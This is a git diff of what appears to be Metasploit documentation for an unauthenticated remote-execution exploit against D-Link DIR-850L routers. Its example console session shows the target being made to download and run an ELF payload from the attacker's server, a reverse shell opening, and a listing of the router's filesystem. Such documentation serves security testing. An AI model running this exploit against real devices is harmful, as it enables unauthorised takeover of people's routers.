@@ -16,7 +16,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing
16
16
## Example
17
17
18
18
```
19
- msf > use exploit/linux/http/dlink_850l_unauth_exec
19
+ msf > use exploit/linux/http/dlink_dir850l_unauth_exec
20
20
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
21
21
RHOST => 192.168.0.14
22
22
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
@@ -26,15 +26,50 @@ LHOST => ens3
26
26
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
27
27
LPORT => 1351
28
28
msf exploit(dlink_850l_unauthenticated_exec) > run
29
+ [*] Exploit running as background job 0.
29
30
30
31
[*] Started reverse TCP handler on 192.168.0.11:1351
31
- [*] 192.168.0.14:80 - Initiating exploitation...
32
- [*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
33
- [*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
34
- [*] 192.168.0.14:80 - Retrieving uid and auth challenge...
35
- [*] Command Stager progress - 100.00% done (101/101 bytes)
36
- [*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
37
- [*] Sending payload to 192.168.0.14 (Wget)
38
- [*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
32
+ msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO
33
+ [*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO
34
+ [*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO
35
+ [*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO
36
+ [*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
37
+ [*] 192.168.0.14:80 - Sending payload to the server...
38
+ [*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO
39
+ [*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO
40
+ [*] 192.168.0.14:80 - Waiting for shell to connect back to us...
41
+ [*] Sending stage (84 bytes) to 192.168.0.14
42
+ [*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400
43
+ [+] Deleted /tmp/dhufstzw
44
+ sessions -i 1
45
+ [*] Starting interaction with 1...
46
+
47
+ 3353690789
48
+ yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC
49
+ true
50
+ MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA
51
+ mMzxldJdkNYWlIrHrOazzOcpCRTuRipt
52
+ OayNFBMDfTSaJIFwpNPoWErXCvLmIguK
53
+ [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
39
54
[*] Server stopped.
55
+ pwd
56
+ /
57
+ ls
58
+ www
59
+ var
60
+ usr
61
+ tmp
62
+ sys
63
+ sbin
64
+ proc
65
+ mydlink
66
+ mnt
67
+ lib
68
+ include
69
+ htdocs
70
+ home
71
+ etc
72
+ dev
73
+ bin
74
+
40
75
```
0 commit comments